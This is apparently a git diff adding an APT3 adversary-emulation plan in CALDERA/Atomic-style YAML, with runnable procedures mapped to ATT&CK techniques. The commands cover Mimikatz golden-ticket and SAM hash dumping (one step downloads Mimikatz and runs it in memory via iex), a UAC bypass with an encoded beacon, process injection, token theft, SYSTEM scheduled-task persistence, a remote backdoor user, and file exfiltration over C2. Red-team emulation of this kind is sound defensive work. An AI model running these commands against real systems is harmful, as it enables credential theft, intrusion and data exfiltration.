Invoke-Mimikatz.ps1 - - input_arguments: - target.domain.name: - description: Target domain name - type: string - default: domain - - target.sid: - description: SID for target user - type: string - default: S-1-5-21-1004336348-1177238915-682003330-512 - - target.ntlm: - description: NTLM hash for target user - type: string - default: 855c3697d9979e78ac404c4ba2c66533 - - target.winrm.username: - description: Username for winrm target user - type: string - default: Administrator - - executors: - - name: powershell - command: | - klist purge; - . .\Invoke-Mimikatz.ps1; - invoke-mimikatz -command "kerberos::golden /domain:#{target.domain.name} /sid:#{target.sid} /rc4:#{target.ntlm} /user:#{target.winrm.username} /ptt"; - klist; - invoke-command -ComputerName scranton -ScriptBlock {net user /add toby "pamBeesly<3"}; - -- id: afb8d8f7-d059-4825-95ae-c5727e2db320 - name: Triggering Persistent - description: Trigger RegKey persistence by rebooting the machine - tactic: persistence - technique: - attack_id: T1218.011 - name: "Signed Binary Proxy Execution: Rundll32" - cti_source: "https://www.fireeye.com/blog/products-and-services/2019/02/state-of-the-hack-no-easy-breach-revisited.html" - procedure_group: procedure_persistence - procedure_step: "20.B" - platforms: - windows: - psh,pwsh: - command: | - Restart-Computer -Force; - - executors: - - name: powershell - command: | - Restart-Computer -Force; diff --git a/apt3/Emulation_Plan/yaml/APT3.yaml b/apt3/Emulation_Plan/yaml/APT3.yaml new file mode 100644 index 00000000..7cdd3254 --- /dev/null +++ b/apt3/Emulation_Plan/yaml/APT3.yaml @@ -0,0 +1,763 @@ +# APT3.yaml - CALDERA and Atomic style TTPs + +- emulation_plan_details: + id: 9e69f345-fdfe-4bbc-bc4f-1c588fa56b4f + adversary_name: APT3 + adversary_description: APT3 (...) + attack_version: 8.1 + format_version: 1.0 + +# Step 2 + +# Phase 1 + +- id: ee08a427-1e1d-4d8a-aeb1-978a7fcf9087 + name: System Network Configuration Discovery + description: The ipconfig utility is executed via cmd to enumerate local TCP/IP network configuration information. + tactic: discovery + technique: + attack_id: T1016 + name: "System Network Configuration Discovery" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_discovery + procedure_step: "2.A.1" + platforms: + windows: + cmd: + command: | + ipconfig /all + + executors: + - name: command_prompt + command: | + ipconfig /all + +- id: 64f1fcb4-399d-4f3b-9a6b-13ec00e1c2ce + name: System Network Configuration Discovery + description: The arp utility is executed via cmd to enumerate local ARP configuration information. + tactic: discovery + technique: + attack_id: T1016 + name: "System Network Configuration Discovery" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_discovery + procedure_step: "2.A.2" + platforms: + windows: + cmd: + command: | + arp -a + + executors: + - name: command_prompt + command: | + arp -a + +# Phase 2 + +- id: 35d95b64-c1f8-4ac7-a2f2-8959218239cd + name: System Owner / User Discovery + description: The native echo command is executed via cmd to enumerate local environment variables associated with current user and domain. + tactic: discovery + technique: + attack_id: T1033 + name: "System Owner/User Discovery" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_discovery + procedure_step: "2.B.1" + platforms: + windows: + cmd: + command: | + echo %USERDOMAIN%\%USERNAME% + + executors: + - name: command_prompt + command: | + echo %USERDOMAIN%\%USERNAME% + +# Phase 3 + +- id: 5df12481-9d8c-4235-b550-9cefc8ed7361 + name: Process Discovery + description: API call(s) are executed to enumerate local running processes. + tactic: discovery + technique: + attack_id: T1057 + name: "Process Discovery" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_discovery + procedure_step: "2.C.1" + platforms: + windows: + psh,pwsh: + command: | + Import-Module .\ps.ps1 -Verbose -Force; + ProcessList + payloads: + - ps.ps1 + + executors: + - name: powershell + command: | + Import-Module .\ps.ps1 -Verbose -Force; + ProcessList + +- id: 41610306-087c-4c34-874b-37b8ed633a36 + name: Process Discovery + description: The tasklist utility is executed via cmd to enumerate local running processes. + tactic: discovery + technique: + attack_id: T1057 + name: "Process Discovery" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_discovery + procedure_step: "2.C.2" + platforms: + windows: + cmd: + command: | + tasklist /v + + executors: + - name: command_prompt + command: | + tasklist /v + +# Phase 4 + +- id: 2ff877b4-0c00-401e-9d3f-070c70b610df + name: System Service Discovery + description: The sc utility is executed via cmd to enumerate local active services. + tactic: discovery + technique: + attack_id: T1007 + name: "System Service Discovery" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_discovery + procedure_step: "2.D.1" + platforms: + windows: + cmd: + command: | + sc query + + executors: + - name: command_prompt + command: | + sc query + +- id: 144b1384-5060-494f-80eb-91772695cdf3 + name: System Service Discovery + description: The net utility is executed via cmd to enumerate local active services. + tactic: discovery + technique: + attack_id: T1007 + name: "System Service Discovery" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_discovery + procedure_step: "2.D.2" + platforms: + windows: + cmd: + command: | + net start + + executors: + - name: command_prompt + command: | + net start + +# Phase 5 + +- id: d2ea2676-7f85-4228-b980-ab3c0e1adc03 + name: System Information Discovery + description: The systeminfo utility is executed via cmd to enumerate local operating system configuration. + tactic: discovery + technique: + attack_id: T1082 + name: "System Information Discovery" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_discovery + procedure_step: "2.E.1" + platforms: + windows: + cmd: + command: | + systeminfo + + executors: + - name: command_prompt + command: | + systeminfo + +- id: 7c2a6e5b-1adb-464f-a581-4677391f8dd6 + name: System Information Discovery + description: The net utility is executed via cmd to enumerate local operating system configuration. + tactic: discovery + technique: + attack_id: T1082 + name: "System Information Discovery" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_discovery + procedure_step: "2.E.2" + platforms: + windows: + cmd: + command: | + net config workstation + + executors: + - name: command_prompt + command: | + net config workstation + +# Phase 6 + +- id: faa96e7f-081a-40b7-a743-a6a7f2627ea3 + name: Permissions Groups Discovery + description: The net utility is executed via cmd to enumerate members of the local system's administrators group. + tactic: discovery + technique: + attack_id: T1069 + name: "Permission Groups Discovery" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_discovery + procedure_step: "2.F.1" + platforms: + windows: + cmd: + command: | + net localgroup administrators + + executors: + - name: command_prompt + command: | + net localgroup administrators + +- id: 26181249-be75-41ed-9fe7-5c30ea8c2d4d + name: Permissions Groups Discovery + description: The net utility is executed via cmd to enumerate members of the domain controller’s administrators group. + tactic: discovery + technique: + attack_id: T1069 + name: "Permission Groups Discovery" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_discovery + procedure_step: "2.F.2" + platforms: + windows: + cmd: + command: | + net localgroup administrators /domain + + executors: + - name: command_prompt + command: | + net localgroup administrators /domain + +- id: 84377d7a-0363-44fd-a082-44657ca1858f + name: Permissions Groups Discovery + description: The net utility is executed via cmd to enumerate members of the domain administrators group. + tactic: discovery + technique: + attack_id: T1069 + name: "Permission Groups Discovery" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_discovery + procedure_step: "2.F.3" + platforms: + windows: + psh,pwsh: + command: | + cmd.exe /c net group "Domain Admins" /domain + + executors: + - name: powershell + command: | + cmd.exe /c net group "Domain Admins" /domain + +# Phase 7 + +- id: 61221fb9-cb32-46d5-98fd-90567a621526 + name: Account Discovery + description: The net utility is executed via cmd to enumerate domain user accounts. + tactic: discovery + technique: + attack_id: T1087 + name: "Account Discovery" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_discovery + procedure_step: "2.G.1" + platforms: + windows: + cmd: + command: | + net user /domain + + executors: + - name: command_prompt + command: | + net user /domain + +- id: 9ce5bf9f-44ec-44c4-bbe0-6d68a83e1b76 + name: Account Discovery + description: The net utility is executed via cmd to enumerate detailed information about a specific user account. + tactic: discovery + technique: + attack_id: T1087 + name: "Account Discovery" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_discovery + procedure_step: "2.G.2" + platforms: + windows: + cmd: + command: | + net user %USERNAME% /domain + + executors: + - name: command_prompt + command: | + net user %USERNAME% /domain + +# Phase 8 + +- id: 5c23f638-9cfc-4fc4-9cab-4af628fef70a + name: Query Registry + description: The reg utility is executed via cmd to enumerate a specific Registry key associated with local system policies to ensure that the user will not be prompted for credentials when elevating permissions. + tactic: discovery + technique: + attack_id: T1012 + name: "Query Registry" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_discovery + procedure_step: "2.H.1" + platforms: + windows: + cmd: + command: | + reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System + + executors: + - name: command_prompt + command: | + reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System + +# Step 3 + +# Phase 9 + +- id: 1345bff7-6f26-43b2-a92a-9aabccdb3db0 + name: Bypass User Account Control + description: A UAC bypass technique is executed to steal the token of an existing high-integrity process and launch a new, high-integrity RAT with limited functionality. + tactic: privilege-escalation + technique: + attack_id: T1134.001 + name: "Access Token Manipulation: Token Impersonation/Theft" + cti_source: "https://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016" + procedure_group: procedure_privesc + procedure_step: "3.A.1" + platforms: + windows: + psh,pwsh: + command: | + Import-Module .\Invoke-BypassUACTokenManipulation.ps1 -Verbose -Force; + Move-Item -Path .\update.ps1 -Destination $env:APPDATA -Force; + $pcode = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("Import-Module $env:APPDATA\update.ps1;update('#{server}')")); + Invoke-BypassUACTokenManipulation -Arguments "-nop -exec bypass -EncodedCommand $pcode" -Verbose + payloads: + - update.ps1 + - Invoke-BypassUACTokenManipulation.ps1 + + input_arguments: + server: + description: IP or Hostname of server + type: string + default: 192.0.2.10 + + executors: + - name: powershell + command: | + Import-Module .\Invoke-BypassUACTokenManipulation.ps1 -Verbose -Force; + Move-Item -Path .\update.ps1 -Destination $env:APPDATA -Force; + $pcode = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("Import-Module $env:APPDATA\update.ps1;update('#{server}')")); + Invoke-BypassUACTokenManipulation -Arguments "-nop -exec bypass -EncodedCommand $pcode" -Verbose + +# Phase 10 + +- id: 088b8639-3f37-42cc-9dc8-01aabb645461 + name: Process Injection + description: The limited functionality high-integrity RAT will inject malicious code into an existing fully functional high-integrity process, resulting in a new elevated, fully functional high-integrity RAT. + tactic: privilege-escalation + technique: + attack_id: T1055 + name: "Process Injection" + cti_source: "https://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016" + procedure_group: procedure_privesc + procedure_step: "3.B.1 - 3.C.1" + platforms: + windows: + psh,pwsh: + command: | + Import-Module .\Invoke-PSInject.ps1 -Verbose -Force; + Move-Item -Path .\update.ps1 -Destination $env:APPDATA -Force; + $pcode = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("Import-Module $env:APPDATA\update.ps1;update('#{server}')")); + Inject -PoshCode $pcode; + payloads: + - update.ps1 + - Invoke-PSInject.ps1 + + input_arguments: + server: + description: IP or Hostname of server + type: string + default: 192.0.2.10 + + executors: + - name: powershell + command: | + Import-Module .\Invoke-PSInject.ps1 -Verbose -Force; + Move-Item -Path .\update.ps1 -Destination $env:APPDATA -Force; + $pcode = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("Import-Module $env:APPDATA\update.ps1;update('#{server}')")); + Inject -PoshCode $pcode; + +# Step 4 + +# Phase 11 + +- id: 59592c35-8207-4896-8d8b-36ad4600245d + name: Remote System Discovery + description: The net utility is executed via cmd to enumerate DCs within the domain + tactic: discovery + technique: + attack_id: T1018 + name: "Remote System Discovery" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_discovery + procedure_step: "4.A.1" + platforms: + windows: + psh,pwsh: + command: | + cmd.exe /c net group "Domain Controllers" /domain + + executors: + - name: powershell + command: | + cmd.exe /c net group "Domain Controllers" /domain + +- id: 24ed020e-4730-4000-b6b4-6b5d3e95314f + name: Remote System Discovery + description: The net utility is executed via cmd to enumerate hosts within the domain. + tactic: discovery + technique: + attack_id: T1018 + name: "Remote System Discovery" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_discovery + procedure_step: "4.A.2" + platforms: + windows: + psh,pwsh: + command: | + cmd.exe /c net group "Domain Computers" /domain + + executors: + - name: powershell + command: | + cmd.exe /c net group "Domain Computers" /domain + +# Phase 12 + +- id: 5f4263c4-7ff1-4098-b5f5-f41faa31cf5b + name: System Network Configuration Discovery + description: The netsh utility is executed via cmd to enumerate local firewall configuration information. + tactic: discovery + technique: + attack_id: T1016 + name: "System Network Configuration Discovery" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_discovery + procedure_step: "4.B.1" + platforms: + windows: + cmd: + command: | + netsh advfirewall show allprofiles + + executors: + - name: command_prompt + command: | + netsh advfirewall show allprofiles + +# Phase 13 + +- id: ba0b398d-91b8-490a-bed2-f959afa8e1aa + name: System Network Connections Discovery (T1049) + description: The netstat utility is executed via cmd to enumerate local active network connections. + tactic: discovery + technique: + attack_id: T1049 + name: "System Network Connections Discovery" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_discovery + procedure_step: "4.C.1" + platforms: + windows: + cmd: + command: | + netstat -ano + + executors: + - name: command_prompt + command: | + netstat -ano + +# Step 5 + +# Phase 14 + +- id: 4ef6009d-2d62-4bb4-8de9-0458df2e9567 + name: Credential Dumping + description: Dumping credentials via wmidump (Mimikatz) + tactic: credential-access + technique: + attack_id: T1003 + name: "Credential Dumping" + cti_source: "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/" + procedure_group: procedure_cred_access + procedure_step: "5.A.1" + platforms: + windows: + psh,pwsh: + command: | + . .\stepFourteen_credDump.ps1; + payloads: + - stepFourteen_credDump.ps1 + + executors: + - name: powershell + command: | + . .\stepFourteen_credDump.ps1; + +# Phase 15 + +- id: effbedc1-1bc8-4a75-9395-980559700008 + name: Credential Dumping using Process Injection + description: Mimikatz lsadump::sam is executed via Invoke-Mimikatz to dump hashes via process injection into LSASS. + tactic: credential-access + technique: + attack_id: T1003 + name: "Credential Dumping" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_cred_access + procedure_step: "5.A.2" + platforms: + windows: + psh,pwsh: + command: | + [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True }; + $web = (New-Object System.Net.WebClient); + $result = $web.DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1"); + iex $result; + function hashdump + { + Invoke-Mimikatz -Command "privilege::debug token::elevate lsadump::sam exit" + }; + hashdump; + + executors: + - name: powershell + command: | + [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True }; + $web = (New-Object System.Net.WebClient); + $result = $web.DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1"); + iex $result; + function hashdump + { + Invoke-Mimikatz -Command "privilege::debug token::elevate lsadump::sam exit" + }; + hashdump; + +# Phase 16 + +- id: 03afada1-1714-408f-bde5-f528b91dc89d + name: 5.B.1 - Access Token Manipulation (T1134), + 6.A.1 - Query Registry (T1012), + 7.B.1 - Remote File Copy (T1105), + 7.C.1 - Scheduled Tasks (T1053), + 8.A.1/2 - File and Directory Discovery (T1083) + description: A token theft script was executed to steal and assume the token of another user’s existing process, changing the user context of the process. + tactic: defensive-evasion + technique: + attack_id: T1134 + name: "Access Token Manipulation" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_def_evasion + procedure_step: "5.B.1 - 8.A.2" + platforms: + windows: + psh,pwsh: + command: | + Import-Module .\StealToken.ps1 -Verbose -Force; + StealToken; + CreateProcessWithToken -CommandLine 'cmd.exe /c reg query "\\#{remote.file.share}\hklm\system\currentcontrolset\control\terminal server"'; + CreateProcessWithToken -CommandLine 'cmd.exe /c schtasks /create /tn "Resume Viewer Update Checker" /tr ".\sandcat.exe #{server} evals" /sc ONLOGON /RU SYSTEM'; + CreateProcessWithToken -CommandLine 'cmd.exe /c dir /s /b #{remote.file.share}'; + CreateProcessWithToken -CommandLine 'cmd.exe /c tree %USERPROFILE%'; + RevertToSelf; + payloads: + - StealToken.ps1 + - sandcat.go-windows + + input_arguments: + remote.file.share: + description: IP or Hostname of remote file share + type: string + default: 192.0.2.10 + + server: + description: IP or Hostname of server + type: string + default: 127.0.0.1 + + executors: + - name: powershell + command: | + Import-Module .\StealToken.ps1 -Verbose -Force; + StealToken; + CreateProcessWithToken -CommandLine 'cmd.exe /c reg query "\\#{remote.file.share}\hklm\system\currentcontrolset\control\terminal server"'; + CreateProcessWithToken -CommandLine 'cmd.exe /c schtasks /create /tn "Resume Viewer Update Checker" /tr ".\sandcat.exe #{server} evals" /sc ONLOGON /RU SYSTEM'; + CreateProcessWithToken -CommandLine 'cmd.exe /c dir /s /b #{remote.file.share}'; + CreateProcessWithToken -CommandLine 'cmd.exe /c tree %USERPROFILE%'; + RevertToSelf; + +# Step 8 + +# Phase 17 + +- id: 0b1841bd-ef8b-475c-bce7-8fcb2860984a + name: Screen Capture (T1113) + description: Native API call(s) were used to collect a screenshot. + tactic: collection + technique: + attack_id: T1113 + name: "Screen Capture" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_collection + procedure_step: "8.D.1" + platforms: + windows: + psh,pwsh: + command: | + Import-Module .\Get-Screenshot.ps1 -Verbose -Force; + Get-Screenshot; + payloads: + - Get-Screenshot.ps1 + + executors: + - name: powershell + command: | + Import-Module .\Get-Screenshot.ps1 -Verbose -Force; + Get-Screenshot; + +# Step 9 + +# Phase 18 + +- id: d5170a60-3bdc-44e0-9870-a38db5c0cf81 + name: File and Directory Discovery (T1083) + description: PowerShell's Get-ChildItem alias 'ls' is used to enumerate files in a remote file share. + tactic: discovery + technique: + attack_id: T1083 + name: "File and Directory Discovery" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_discovery + procedure_step: "9.A.1" + platforms: + windows: + psh,pwsh: + command: | + ls #{remote.file.share} + + input_arguments: + remote.file.share: + description: IP or Hostname of remote file share + type: string + default: 192.0.2.20 + + executors: + - name: powershell + command: | + ls #{remote.file.share} + +- id: 2d18c8ec-4593-49dc-9bf4-11d0673d6ae6 + name: Data from staged file (T1074) and Exfiltration over C2 Channel (T1041) + description: Copy a target file from a remote file share through the existing C2 channel + tactic: exfiltration + technique: + attack_id: T1041 + name: "Exfiltration Over C2 Channel" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_exfiltration + procedure_step: "9.B.1" + platforms: + windows: + psh,pwsh: + command: | + Import-Module .\upload.ps1 -Verbose -Force; + Invoke-MultipartFormDataUpload -InFile "C:\Users\#{profile_user}\Desktop\working.zip" -Uri "#{server}/file/upload"; + cleanup: | + remove-item upload.ps1 -Force + payloads: + - upload.ps1 + + input_arguments: + profile_user: + description: Name of profile user + type: string + default: Administrator + + server: + description: IP or Hostname of server + type: string + default: 192.0.2.10 + + executors: + - name: powershell + command: | + Import-Module .\upload.ps1 -Verbose -Force; + Invoke-MultipartFormDataUpload -InFile "C:\Users\#{profile_user}\Desktop\working.zip" -Uri "#{server}/file/upload"; + cleanup_command: | + remove-item upload.ps1 -Force + +# Step 10 + +# Phase 19 + +- id: 4b2e9574-b1a7-4b38-95b2-6054ded9c4fe + name: Scheduled Task + description: Reboot the machine to aid in peristence callbacks + tactic: impact + technique: + attack_id: T1529 + name: "System Shutdown/Reboot" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_impact + procedure_step: "10.A.1-10.A.2" + platforms: + windows: + psh,pwsh: + command: | + write-host "[*] Restarting Computer"; + Restart-Computer -Force; + + executors: + - name: powershell + command: | + write-host "[*] Restarting Computer"; + Restart-Computer -Force; + +